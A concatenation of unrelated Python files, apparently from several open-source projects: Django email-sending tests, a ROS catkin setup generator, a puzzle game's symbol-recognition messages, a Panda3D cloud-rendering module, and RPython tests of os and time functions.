self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_bulk_multiple_events_only_following_false(self):
"""
Handles bulk creating events and tests the unique constraint of the duplicated subscription which would cause
a bulk create error if it wasn't handled
"""
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
G(Event, source=source, context=email_context)
EntityEmailerInterface.bulk_convert_events_to_emails()
self.assertEquals(Email.objects.count(), 2)
for email in Email.objects.all():
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_multiple_events_only_following_true(self):
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_bulk_multiple_events_only_following_true(self):
"""
Handles bulk creating events and tests the unique constraint of the duplicated subscription which would cause
a bulk create error if it wasn't handled
"""
source = G(Source)
e = G(Entity)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
G(Event, source=source, context=email_context)
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.bulk_convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2014-01-05')
class SendUnsentScheduledEmailsTest(TestCase):
def setUp(self):
G(Medium, name='email')
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_all_scheduled_emails_no_email_addresses(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = []
g_email(context={}, scheduled=datetime.min)
g_email(context={}, scheduled=datetime.min)
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(len(mail.outbox), 0)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_all_scheduled_emails(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime.min)
g_email(context={}, scheduled=datetime.min)
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(2, mock_connection.return_value.__enter__.return_value.send_message.call_count)
@patch('entity_emailer.interface.pre_send')
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_send_signals(self, render_mock, address_mock, mock_pre_send):
"""
Test that we properly fire signals during the send process
"""
# Setup the email
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
email = g_email(context={
'test': 'test'
}, scheduled=datetime.min)
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
# Assert that we sent the email
self.assertEqual(1, mock_connection.return_value.__enter__.return_value.send_message.call_count)
# Assert that we called the pre send signal with the proper values
name, args, kwargs = mock_pre_send.send.mock_calls[0]
self.assertEqual(kwargs['sender'], email.event.source.name)
self.assertEqual(kwargs['email'], email)
self.assertEqual(kwargs['event'], email.event)
self.assertEqual(kwargs['context'], {
'test': 'test',
'entity_emailer_id': str(email.view_uid)
})
self.assertIsInstance(kwargs['message'], EmailMultiAlternatives)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_email_with_specified_from_address(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
from_address = 'test@example.com'
g_email(context={}, from_address=from_address, scheduled=datetime.min)
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
args = mock_connection.return_value.__enter__.return_value.send_message.call_args
self.assertEqual(args[0][0].from_email, from_address)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_no_future_emails(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime(2014, 1, 6))
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(len(mail.outbox), 0)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_sends_no_sent_emails(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime.min, sent=datetime.utcnow())
EntityEmailerInterface.send_unsent_scheduled_emails()
self.assertEqual(len(mail.outbox), 0)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_updates_times(self, render_mock, address_mock):
render_mock.return_value = ['<p>This is a test html email.</p>', 'This is a test text email.']
address_mock.return_value = ['test1@example.com', 'test2@example.com']
g_email(context={}, scheduled=datetime.min)
EntityEmailerInterface.send_unsent_scheduled_emails()
sent_email = Email.objects.filter(sent__isnull=False)
self.assertEqual(sent_email.count(), 1)
@patch('entity_emailer.interface.email_exception')
@patch('entity_emailer.interface.get_subscribed_email_addresses')
@patch.object(Event, 'render', spec_set=True)
def test_exceptions(self, render_mock, address_mock, mock_email_exception):
"""
Test that we properly handle when an exception occurs
"""
# Mock the render method to raise an exception that we should properly catch
render_mock.side_effect = [
Exception('test'),
['<p>This is a test html email.</p>', 'This is a test text email.']
]
address_mock.return_value = ['test1@example.com', 'test2@example.com']
# Create a test emails to send
g_email(context={}, scheduled=datetime.min)
g_email(context={
'test': 'test'
}, scheduled=datetime.min)
# Send the emails
with patch(settings.EMAIL_BACKEND) as mock_connection:
EntityEmailerInterface.send_unsent_scheduled_emails()
# Assert that both emails were marked as sent
self.assertEqual(Email.objects.filter(sent__isnull=False).count(), 2)
# Assert that only one email is actually sent through backend
self.assertEquals(1, mock_connection.call_count)
# Assert that one email raised an exception
exception_email = Email.objects.get(sent__isnull=False, exception__isnull=False)
self.assertIsNotNone(exception_email)
self.assertTrue('Exception: test' in exception_email.exception)
@patch.object(Event, 'render', spec_set=True)
@patch('entity_emailer.interface.get_subscribed_email_addresses')
def test_send_exceptions(self, mock_get_subscribed_addresses, mock_render):
"""
Verifies that when a single email raises an exception from within the backend, the batch is still
updated as sent and the failed email is saved with the exception
"""
# Create test emails to send
g_email(context={}, scheduled=datetime.min)
failed_email = g_email(context={}, scheduled=datetime.min)
mock_get_subscribed_addresses.return_value = ['test1@example.com']
mock_render.return_value = ('foo', 'bar',)
# Verify baseline, namely that both emails are not marked as sent and that neither has an exception saved
self.assertEquals(2, Email.objects.filter(sent__isnull=True).count())
class TestEmailSendMessageException(Exception):
def to_dict(self):
return {'message': str(self)}
with patch(settings.EMAIL_BACKEND) as mock_connection:
# Mock side effects for sending emails
mock_connection.return_value.__enter__.return_value.send_message.side_effect = [
None,
TestEmailSendMessageException('test'),
]
EntityEmailerInterface.send_unsent_scheduled_emails()
# Verify that both emails are marked as sent
self.assertEquals(2, Email.objects.filter(sent__isnull=False).count())
# Verify that the failed email was saved with the exception
actual_failed_email = Email.objects.get(sent__isnull=False, exception__isnull=False)
self.assertEquals(failed_email.id, actual_failed_email.id)
self.assertEquals(
'test: {}'.format(json.dumps({'message': 'test'})),
actual_failed_email.exception
)
class CreateEmailObjectTest(TestCase):
def test_no_html(self):
email = create_email_message(
['to@example.com'], 'from@example.com', 'Subject', 'Email Body.', ''
)
email.send()
self.assertEqual(mail.outbox[0].attachments, [])
def test_html(self):
email = create_email_message(
['to@example.com'], 'from@example.com', 'Subject', 'Email Body.', '<html>A</html>'
)
email.send()
expected_alternatives = [('<html>A</html>', 'text/html')]
self.assertEqual(mail.outbox[0].alternatives, expected_alternatives)
class GetSubscribedEmailAddressesTest(TestCase):
def test_get_emails_default_settings(self):
e1 = G(Entity, entity_meta={'email': 'hello1@hello.com'})
e2 = G(Entity, entity_meta={'email': 'hello2@hello.com'})
e3 = G(Entity, entity_meta={'email': ''})
e4 = G(Entity, entity_meta={})
email = g_email(recipients=[e1, e2, e3, e4], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(set(addresses), set(['hello1@hello.com', 'hello2@hello.com']))
@override_settings(ENTITY_EMAILER_EMAIL_KEY='email_address')
@override_settings(ENTITY_EMAILER_EXCLUDE_KEY='last_invite_time')
def test_get_emails_override_email_key(self):
e1 = G(Entity, entity_meta={'email_address': 'hello1@hello.com', 'last_invite_time': 1000})
e2 = G(Entity, entity_meta={'email_address': 'hello2@hello.com', 'last_invite_time': None})
e3 = G(Entity, entity_meta={'email_address': 'hello3@hello.com', 'last_invite_time': False})
email = g_email(recipients=[e1, e2, e3], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(set(addresses), set(['hello1@hello.com']))
@override_settings(ENTITY_EMAILER_EMAIL_KEY='email_address')
def test_get_emails_override_email_key_exclude_key(self):
e1 = G(Entity, entity_meta={'email_address': 'hello1@hello.com'})
e2 = G(Entity, entity_meta={'email_address': 'hello2@hello.com'})
email = g_email(recipients=[e1, e2], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(set(addresses), set(['hello1@hello.com', 'hello2@hello.com']))
class GetFromEmailAddressTest(TestCase):
def test_default_from_email(self):
# settings.DEFAULT_FROM_EMAIL is already set to test@example.com
from_email = get_from_email_address()
expected = 'test@example.com'
self.assertEqual(from_email, expected)
@override_settings(ENTITY_EMAILER_FROM_EMAIL='test_entity@example.com')
def test_entity_emailer_from_email(self):
from_email = get_from_email_address()
expected = 'test_entity@example.com'
self.assertEqual(from_email, expected)
class GetEmailAddressesTest(TestCase):
def test_returns_own_email(self):
entity_1 = G(Entity, entity_meta={'email': 'test_1@example.com'})
entity_2 = G(Entity, entity_meta={'email': 'test_2@example.com'})
email = g_email(recipients=[entity_1, entity_2], context={})
addresses = get_subscribed_email_addresses(email)
expected_addresses = {u'test_1@example.com', u'test_2@example.com'}
self.assertEqual(set(addresses), expected_addresses)
def test_no_recipients(self):
email = g_email(recipients=[], context={})
addresses = get_subscribed_email_addresses(email)
self.assertEqual(addresses, [])
|
"""Tests for `qdyn` package."""
import pytest
from pkg_resources import parse_version
import qdyn
def test_valid_version():
"""Check that the package defines a valid __version__"""
assert parse_version(qdyn.__version__) >= parse_version("0.3.0-dev")
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in "/home/caster/ros_ws/caster/devel;/opt/ros/melodic".split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/caster/ros_ws/caster/devel/.private/caster_teleop/env.sh')
output_filename = '/home/caster/ros_ws/caster/build/caster_teleop/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
#print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
from math import tau
from random import choice
import pkgutil
import string
from .common import change_sprite_image
ROTS = {
(1, 0): 0,
(0, 1): 1,
(-1, 0): 2,
(0, -1): 3,
}
SYMBOLS = {}
text = pkgutil.get_data('mufl', 'text/symbols.txt').decode('utf-8')
for line in text.splitlines():
sym, codes = line.rsplit(maxsplit=1)
for i in range(0, len(codes), 4):
key = codes[i:i+4]
SYMBOLS[key] = sym
def encode_letter(letter):
enc = []
for x in range(4):
num = 0
for y in range(5):
num <<= 1
if (x, y) in letter:
num += 1
enc.append(chr(48+num))
return ''.join(enc)
class ThingTile:
def __init__(self):
self.filled = False
self.corners = [False] * 4
def get_sprite_info(self):
fc = '01'[self.filled]
num_corners = sum(self.corners)
if num_corners == 0:
return f'block_{fc}0000', 0
elif num_corners == 1:
return f'block_{fc}1000', tau/4 * self.corners.index(True)
elif num_corners == 2:
if self.corners == [True, False, True, False]:
return f'block_{fc}1010', 0
elif self.corners == [False, True, False, True]:
return f'block_{fc}1010', tau/4
elif self.corners == [True, False, False, True]:
return f'block_{fc}1100', tau*3/4
else:
return f'block_{fc}1100', tau/4 * self.corners.index(True)
elif num_corners == 3:
return f'block_{fc}1110', tau/4 * (self.corners.index(False) + 2)
else:
return f'block_{fc}1111', 0
def update_sprite(self, sprite):
image, rotation = self.get_sprite_info()
change_sprite_image(sprite, image)
sprite.angle = rotation
def set_wormy_corners(self, d, plus=0):
rot = ROTS[d] + plus
self.set_corner(rot)
self.set_corner(rot-1)
def set_corner(self, c):
self.corners[c%4] = True
def encode(self):
num = int(self.filled)
for corner in self.corners:
num <<= 1
num |= corner
return chr(ord('0') + num)
@classmethod
def from_code(cls, code):
self = cls()
num = ord(code) - ord('0')
for i, corner in reversed(list(enumerate(self.corners))):
self.corners[i] = bool(num & 1)
num >>= 1
self.filled = bool(num & 1)
return self
def encode_thing(thing):
thingset = {pos for pos, tile in thing.items() if tile.filled}
letter = encode_letter(thingset)
tileset = ''.join(thing[x, y].encode() for x in range(4) for y in range(5))
return f'{letter}-{tileset}-{SYMBOLS.get(letter, "")}'
def classify_thing(thing):
shape = frozenset(pos for (pos, tile) in thing.items() if tile.filled)
return encode_letter(shape)
def get_thing_sprite_info(thing_string):
code, tileinfo, comment = thing_string.split('-')
for i, c in enumerate(tileinfo):
if c != '0':
x = i // 5
y = i % 5
yield (x, y, *ThingTile.from_code(c).get_sprite_info())
def get_thing_mesage(encoded):
sym = SYMBOLS.get(encoded)
def cls(*choices):
return choice(list(set((choices))))
usefuls = (
"It doesn't look useful.",
"Probably not too useful here.",
"Probably not too useful.",
"In other words, trash.",
"It doesn't look useful here.",
"You don't know what to do with that.",
"You don't see how it can be useful here.",
)
if sym is None:
ci = cls('a curious', 'an interesting', 'a weird')
useful = cls(*usefuls)
useful_waste = cls(
*usefuls,
"A waste of metal.",
"A waste of material.",
"Frankly, this is a waste of metal.",
)
return cls(
f"That doesn't remind you of anything.\n{useful_waste}",
f"It's… um… modern art?\n{useful_waste}",
f"Doesn't look familiar.\n{useful_waste}",
f"That's {ci} piece of metal.\n{useful}",
f"That's {ci} hunk of metal.\n{useful}",
)
if sym == 'box':
return cls(
f"A roughly rectangular piece of metal.",
) + "\n" + cls(*usefuls)
elif sym == '.':
return cls(
f"A tiny bit of metal.",
) + "\n" + cls(*usefuls)
elif len(sym) == 1:
if sym in string.ascii_uppercase:
letrune = choice(('letter', 'rune'))
message = cls(
f"That is the {letrune} {sym}!",
f"That's the {letrune} {sym}!",
f"It is the {letrune} {sym}!",
f"It's the {letrune} {sym}!",
f"A perfect {letrune} {sym}!",
f"A perfect {sym}!",
f"You made the {letrune} {sym}!",
f"You made a {sym}!",
f"The {letrune} {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That should get some attention!",
f"Display it!",
f"It will be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
"That's not too interesting.",
"It doesn't look useful.",
)
return message
if sym in string.ascii_lowercase:
sym = sym.upper()
letrune = choice(('letter', 'rune'))
message = cls(
f"That resembles the {letrune} {sym}.",
f"Looks a bit like the {letrune} {sym}.",
f"Someone could read it as the {letrune} {sym}...",
f"It's a bit like the {letrune} {sym}!",
f"It's similar to a {sym}!",
)
if sym in 'HELP':
message += "\n" + cls(
f"That could get some attention.",
f"Try to display it.",
f"It might be helpful!",
)
else:
message += "\n" + cls(
*usefuls,
f"Frankly, a waste of metal.",
)
return message
else:
message = cls(
f"That resembles the symbol {sym}...",
f"It's… the symbol “{sym}”!",
f"Someone could read it as “{sym}”",
f"It's a bit like a “{sym}”.",
f"It's similar to a “{sym}”.",
)
message += "\n" + cls(
*usefuls,
"Frankly, a waste of metal.",
)
return message
elif sym == 'hook':
return cls(
f"A hook!\nMight make the fishing easier.",
f"It's a fish hook!",
f"A hook!\nYou'll use it next time you fish.",
f"A metal fish hook!\nProbably not more effective than your regular ones.",
)
else:
return cls(
f"It's a {sym}.",
f"A {sym}!",
f"It resembles a {sym}.",
f"You made a metal {sym}!",
f"Looks like a {sym}.",
) + "\n" + cls(*usefuls)
|
"""
WSGI config for agender_ui project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'agender_ui.settings')
application = get_wsgi_application()
|
# -*- coding: utf-8 -*-
# Copyright Aaron Snoswell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import posixpath, random
#from pandac.PandaModules import Point2, Vec3, Vec4, NodePath, CardMaker, Shader, ColorBlendAttrib, Texture
from pandac.PandaModules import *
from direct.task.Task import Task
from direct.interval.IntervalGlobal import *
class CloudObj():
"""An object to represent a single cloud cluster"""
def __init__(self, filename, splat_texture, position, softness=0.5, visibility=0.5):
# Each cloud has a .egg file and a splat texture associated with it
self.model = loader.loadModel(filename)
self.splat_texture = splat_texture
# Attach this cloud's node and create the list of sprites
self.cloud_node = base.cam.attachNewNode("cloud"+str(random.random()))
self.cloud_node.setCompass()
self.sprites = []
# The cloud has a value that represents how formated or dissolved it is
self.visibility = visibility
# This is used for the fading in and out
self.longest_dist = 0
# Set the cloud's position
self.cloud_node.setPos(base.cam, position)
# Note - stratus type clouds use higher softness values
# Cumulus clouds use lower softness values
self.softness = softness
def set_visibility(self, vis):
"""Sets the visibility of the cloud,
the futher away from the center each sprite is, the less visibile"""
self.visibility = vis
for sprite in self.sprites:
sprite[1].setAlphaScale((1.0-sprite[0])*vis)
def _getmiddle(self, points):
"""Returns the center of a sequence of 3-space points"""
num, x, y, z = 0, 0, 0, 0
for point in points:
x += point.getX()
y += point.getY()
z += point.getZ()
num += 1
return Point3(x*1.0/num,y*1.0/num,z*1.0/num)
def generate_sprites(self):
"""Replaces each object in the model with a sprite"""
cm = CardMaker("spritemaker")
# Create each sprite
for cloudobj in self.model.getChild(0).getChildren():
tight_bounds = cloudobj.getTightBounds()
sprite_midpoint = self._getmiddle(tight_bounds)
#Set the size of the billboard, !roughly based on the size of the box
cm.setFrame(tight_bounds[0].getX(), tight_bounds[1].getY(),
tight_bounds[0].getZ(), tight_bounds[1].getZ())
# Choose a texture splat image based on the softness value
tmpsoftness = random.gauss(self.softness, 0.1); num = 0;
if tmpsoftness <= 1*.0625: pass
elif tmpsoftness <= 2*.0625: num = 1
elif tmpsoftness <= 3*.0625: num = 2
elif tmpsoftness <= 4*.0625: num = 3
elif tmpsoftness <= 5*.0625: num = 4
elif tmpsoftness <= 6*.0625: num = 5
elif tmpsoftness <= 7*.0625: num = 6
elif tmpsoftness <= 8*.0625: num = 7
elif tmpsoftness <= 9*.0625: num = 8
elif tmpsoftness <= 10*.0625: num = 9
elif tmpsoftness <= 11*.0625: num = 10
elif tmpsoftness <= 12*.0625: num = 11
elif tmpsoftness <= 13*.0625: num = 12
elif tmpsoftness <= 14*.0625: num = 13
elif tmpsoftness <= 15*.0625: num = 14
else: num = 15
row,column = divmod(num, 4)
cm.setUvRange((row*0.25, column*0.25), ((row+1)*0.25, ((column+1)*0.25)))
# Create the sprite
sprite = self.cloud_node.attachNewNode(cm.generate())
sprite.setPos(self.cloud_node, sprite_midpoint)
sprite.setTexture(self.splat_texture)
sprite.setBillboardPointEye()
#sprite.setBillboardAxis()
sprite.setTwoSided(True)
#sprite.setBin('background', 20)
sprite.setTransparency(TransparencyAttrib.MDual)
sprite.setLightOff()
# Calc the distance from the center of the cloud to this sprite
distance = Vec3(sprite.getPos(self.cloud_node)).length()
if self.longest_dist < distance: self.longest_dist = distance
self.sprites.append([distance, sprite])
# Remove the model from the scene, the sprites are all we want now
self.model.removeNode()
# Re-sort the sprites from closest to the core->furthest from the core
# While we're at it, we pre-calc the normalised distances
self.sprites = sorted(self.sprites)
for sprite in self.sprites:
sprite[0] = sprite[0] / self.longest_dist
# Set the visibility of the cloud
self.set_visibility(self.visibility)
class Clouds:
"""This creates a cloud system based on artist input."""
def __init__(self,manager,xml):
# Get the path to load clouds from...
basePath = manager.get('paths').getConfig().find('clouds').get('path')
self.cloudlist = []
xmlcloudlist = [x for x in xml.findall('cloud')]
cloudsplattexture = loader.loadTexture(posixpath.join(basePath, xml.find('splat').get('fname')))
# XXX See if the user is requesting a cloudbox or a position
# Needs to be handled much better than this
self.cloudbox = None
self.cloudpos = None
xmlcloudbox = xml.find('range')
xmlcloudpos = xml.find('pos')
if xmlcloudbox != None:
self.cloudbox = (Point3(int(xmlcloudbox.get('x1')),
int(xmlcloudbox.get('y1')),
int(xmlcloudbox.get('z1'))),
Point3(int(xmlcloudbox.get('x2')),
int(xmlcloudbox.get('y2')),
int(xmlcloudbox.get('z2'))))
if xmlcloudpos != None:
self.cloudpos = Point3(int(xmlcloudpos.get('x')),
int(xmlcloudpos.get('y')),
int(xmlcloudpos.get('z')))
# Iterate over each of the requested clouds
for cloud in xrange(len(xmlcloudlist)):
# Read the values from the xml file
filename = str(xmlcloudlist[cloud].get('filename'))
softness = float(xmlcloudlist[cloud].get('softness'))
# Set the cloud in the list
if self.cloudbox:
# Chose a random position for the cloud
pos = Point3(random.randint(self.cloudbox[0].getX(), self.cloudbox[1].getX()),
random.randint(self.cloudbox[0].getY(), self.cloudbox[1].getY()),
random.randint(self.cloudbox[0].getZ(), self.cloudbox[1].getZ()))
cloud = CloudObj(posixpath.join(basePath, filename), cloudsplattexture, pos, softness)
cloud.generate_sprites()
self.cloudlist.append(cloud)
else:
# Default the cloud to (0,0,0)
cloud = CloudObj(posixpath.join(basePath, filename), cloudsplattexture, self.cloudpos, softness)
cloud.generate_sprites()
self.cloudlist.append(cloud)
# Create a testing lerp of the cloud's vis
cloudfadeout = LerpFunc(cloud.set_visibility, 10, 1, 0, 'easeInOut')
cloudfadein = LerpFunc(cloud.set_visibility, 10, 0, 1, 'easeInOut')
cloudsequence = Sequence(cloudfadeout,cloudfadein)
cloudsequence.loop()
|
import py
import os, time, sys
from rpython.tool.udir import udir
from rpython.rlib.rarithmetic import r_longlong
from rpython.annotator import model as annmodel
from rpython.translator.c.test.test_genc import compile
from rpython.translator.c.test.test_standalone import StandaloneTests
posix = __import__(os.name)
def test_time_clock():
def does_stuff():
t1 = t2 = time.clock()
while abs(t2 - t1) < 0.01:
t2 = time.clock()
return t2 - t1
f1 = compile(does_stuff, [])
t = f1()
assert 0 < t < 1.5
def test_time_sleep():
def does_nothing():
time.sleep(0.19)
f1 = compile(does_nothing, [])
t0 = time.time()
f1()
t1 = time.time()
assert t0 <= t1
assert t1 - t0 >= 0.15
def test_os_open():
tmpfile = str(udir.join('test_os_open.txt'))
def does_stuff():
fd = os.open(tmpfile, os.O_WRONLY | os.O_CREAT, 0777)
os.close(fd)
return fd
f1 = compile(does_stuff, [])
fd = f1()
assert os.path.exists(tmpfile)
def test_failing_os_open():
tmpfile = str(udir.join('test_failing_os_open.DOESNTEXIST'))
def does_stuff():
fd = os.open(tmpfile, os.O_RDONLY, 0777)
return fd
f1 = compile(does_stuff, [])
f1(expected_exception_name='OSError')
assert not os.path.exists(tmpfile)
def test_open_read_write_seek_close():
filename = str(udir.join('test_open_read_write_close.txt'))
def does_stuff():
fd = os.open(filename, os.O_WRONLY | os.O_CREAT, 0777)
count = os.write(fd, "hello world\n")
assert count == len("hello world\n")
os.close(fd)
fd = os.open(filename, os.O_RDONLY, 0777)
result = os.lseek(fd, 1, 0)
assert result == 1
data = os.read(fd, 500)
assert data == "ello world\n"
os.close(fd)
f1 = compile(does_stuff, [])
f1()
with open(filename, 'r') as fid:
assert fid.read() == "hello world\n"
os.unlink(filename)
def test_big_read():
filename = str(udir.join('test_open_read_write_close.txt'))
def does_stuff():
fd = os.open(filename, os.O_WRONLY | os.O_CREAT, 0777)
count = os.write(fd, "hello world\n")
os.close(fd)
fd = os.open(filename, os.O_RDONLY, 0777)
data = os.read(fd, 500000)
os.close(fd)
f1 = compile(does_stuff, [])
f1()
os.unlink(filename)
def test_ftruncate():
if not hasattr(os, 'ftruncate'):
py.test.skip("this os has no ftruncate :-(")
filename = str(udir.join('test_open_read_write_close.txt'))
def does_stuff():
fd = os.open(filename, os.O_WRONLY | os.O_CREAT, 0777)
os.write(fd, "hello world\n")
os.close(fd)
fd = os.open(filename, os.O_RDWR, 0777)
os.ftruncate(fd, 5)
data = os.read(fd, 500)
assert data == "hello"
os.close(fd)
does_stuff()
f1 = compile(does_stuff, [])
f1()
os.unlink(filename)
def need_sparse_files():
if sys.platform == 'darwin':
py.test.skip("no sparse files on default Mac OS X file system")
if os.name == 'nt':
py.test.skip("no sparse files on Windows")
def test_largefile():
if not hasattr(os, 'ftruncate'):
py.test.skip("this os has no ftruncate :-(")
need_sparse_files()
filename = str(udir.join('test_largefile'))
r4800000000 = r_longlong(4800000000L)
r4900000000 = r_longlong(4900000000L)
r5000000000 = r_longlong(5000000000L)
r5200000000 = r_longlong(5200000000L)
r9900000000 = r_longlong(9900000000L)
r10000000000 = r_longlong(10000000000L)
def does_stuff():
fd = os.open(filename, os.O_RDWR | os.O_CREAT, 0666)
os.ftruncate(fd, r10000000000)
res = os.lseek(fd, r9900000000, 0)
assert res == r9900000000
res = os.lseek(fd, -r5000000000, 1)
assert res == r4900000000
res = os.lseek(fd, -r5200000000, 2)
assert res == r4800000000
os.close(fd)
try:
os.lseek(fd, 0, 0)
except OSError:
pass
else:
print "DID NOT RAISE"
raise AssertionError
st = os.stat(filename)
assert st.st_size == r10000000000
does_stuff()
os.unlink(filename)
f1 = compile(does_stuff, [])
f1()
os.unlink(filename)
def test_os_access():
filename = str(py.path.local(__file__))
def call_access(path, mode):
return os.access(path, mode)
f = compile(call_access, [str, int])
for mode in os.R_OK, os.W_OK, os.X_OK, (os.R_OK | os.W_OK | os.X_OK):
assert f(filename, mode) == os.access(filename, mode)
def test_os_stat():
filename = str(py.path.local(__file__))
has_blksize = hasattr(os.stat_result, 'st_blksize')
has_blocks = hasattr(os.stat_result, 'st_blocks')
def call_stat():
st = os.stat(filename)
res = (st[0], st.st_ino, st.st_ctime)
if has_blksize: res += (st.st_blksize,)
if has_blocks: res += (st.st_blocks,)
return str(res)
f = compile(call_stat, [])
res = eval(f())
assert res[0] == os.stat(filename).st_mode
assert res[1] == os.stat(filename).st_ino
st_ctime = res[2]
if isinstance(st_ctime, float):
assert (st_ctime - os.stat(filename).st_ctime) < 0.1
else:
assert st_ctime == int(os.stat(filename).st_ctime)
if has_blksize:
assert res[3] == os.stat(filename).st_blksize
if has_blocks:
assert res[4] == os.stat(filename).st_blocks
def test_os_stat_raises_winerror():
if sys.platform != 'win32':
py.test.skip("no WindowsError on this platform")
def call_stat():
try:
os.stat("nonexistentdir/nonexistentfile")
except WindowsError, e:
return e.winerror
return 0
f = compile(call_stat, [])
res = f()
expected = call_stat()
assert res == expected
def test_os_fstat():
if os.environ.get('PYPY_CC', '').startswith('tcc'):
py.test.skip("segfault with tcc :-(")
filename = str(py.path.local(__file__))
def call_fstat():
fd = os.open(filename, os.O_RDONLY, 0777)
st = os.fstat(fd)
os.close(fd)
return str((st.st_mode, st[1], st.st_mtime))
f = compile(call_fstat, [])
osstat = os.stat(filename)
st_mode, st_ino, st_mtime = eval(f())
assert st_mode == osstat.st_mode
if sys.platform != 'win32':
assert st_ino == osstat.st_ino
if isinstance(st_mtime, float):
assert (st_mtime - osstat.st_mtime) < 0.1
else:
assert st_mtime == int(osstat.st_mtime)
def test_os_isatty():
def call_isatty(fd):
return os.isatty(fd)
f = compile(call_isatty, [int])
assert f(0) == os.isatty(0)
assert f(1) == os.isatty(1)
